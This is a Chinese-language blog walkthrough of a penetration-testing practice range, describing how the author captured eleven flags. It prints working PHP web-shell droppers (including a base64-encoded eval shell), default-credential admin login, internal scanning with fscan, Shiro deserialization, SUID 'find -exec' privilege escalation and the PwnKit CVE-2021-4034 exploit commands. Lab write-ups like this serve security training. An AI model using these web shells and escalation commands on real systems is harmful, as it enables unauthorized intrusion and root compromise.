一直不知道自己的第一篇文章寫什么(主要是懶),正好發現這個滲透測驗的wp很少,寫一篇wp混一下,
廢話不多說,直接開始正題
第一個flag
進來發現是個語言教程的場景,web第一步,f12開啟!
第二個flag
果然一眼丁真,他說第二個flag要管理員才能拿,就想著拿一下權限試試
在剛進來的一開始我們就發現了這是個語言教程的場景的靶場,而這種靶場是需要語言運行環境,若權限設定不當,很容易造成rce,于是直接找到我們的老朋友PHP,簡單嘗試一下,果然可以!
于是乎拿出珍藏已久的payload一打,這兩個都是可以的
<?php
fputs(fopen("shell.php","w"),'<?php eval($_POST[123]);?>');
?>
<?php
system("echo PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg== | base64 -d >0vers1eep.php & ls");
?>
拿蟻劍進行連接
也是成功上線,(但是最后發現是我理解錯誤,他說的管理員權限是登錄網站后臺,而我誤以為是拿到權限)
于是去嘗試登錄網站后臺
直接在url后加admin
賬號密碼:admin/admin,即可成功登錄后臺拿取第二個flag
第三個flag
根據提示在根目錄,去根目錄進行翻找(前面已經拿到權限)
第三個flag get!
第四個flag
根據提示下一個在資料庫和root權限下,我們先用哥斯拉嘗試連接翻找資料庫
用哥斯拉生成一個后門檔案,通過蟻劍把后門檔案上傳到后臺,在資料庫翻找一下組態檔
找到后配置一下
即找到資料庫flag
第五個flag
不大會(有懂的師傅可以教教)
第六個flag
開始我們的內網之旅!
上傳fscan掃描一波,用到的陳述句如下
上傳檔案fscan_386
chmod 777 fscan_386 //給檔案加權限
ifconfig //看ip地址
./fscan_386 -h 192.168.0.2/24 -o 0vers1eep.txt //開掃!并把掃描結果放到一個名為0vers1eep.txt的檔案里
成功匯出0vers1eep.txt檔案,接下來就是開代理上內網
我用的是neoreg和Proxifier代理(此工具使用就不演示了,有問題可私聊我一下)
成功登錄內網
我們拿御劍等掃描工具掃一下
成功在robots.txt檔案中發現第六個flag
第七個flag
嘗試弱口令登錄并抓包
結果意外發現rememberMe=deleteMe,可能存在shiro反序列
于是利用利用工具一把梭哈
生成后門嘗試連接
連接上去發現第七個flag
第八個flag
我們繼續基本思路,嘗試提權
先查看確定flag的路徑
可見/home下的flag我們已經獲取,就差/root權限下的flag
我們嘗試使用suid提權進行查看flag
find anyfile -exec whoami \; //anyfile:在你所在的目錄檔案下的任意檔案
find anyfile -exec cat /root/flag \;
成功提權
查看flag
成功獲取flag
第九個flag
根據基本思路(普通用戶—>后臺用戶—>資料庫—>root提權),上個站的flag也基本拿完了,于是我們換下一個站繼續
直接上尚方寶劍
蟻劍連接后直接拿下flag
第十個flag
依舊是換湯不換藥
哥斯拉連接資料庫,查看flag
成功拿下,根據提示繼續拿root權限
第十一個flag
得拿下root權限,這里需要用到CVE-2021-4034
上傳payload檔案后
chmod 777 PwnKit //加權限
./PwnKit 'cat /root/flag' //查看flag
即可得到最后一個flag
到這里,一次愉快的靶場滲透之旅就結束了!!!
總結
要形成一個滲透的基本思路:簡單來說就是,想盡辦法從低權限到高權限,
不要局限與一種方法,嘗試多種方法來達到自己的想要的結果,
多嘗試,多動手,多思考,
讀萬卷書,行萬里路!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/518859.html
標籤:其他
上一篇:智能3D可視化,讓礦山遠離臟亂危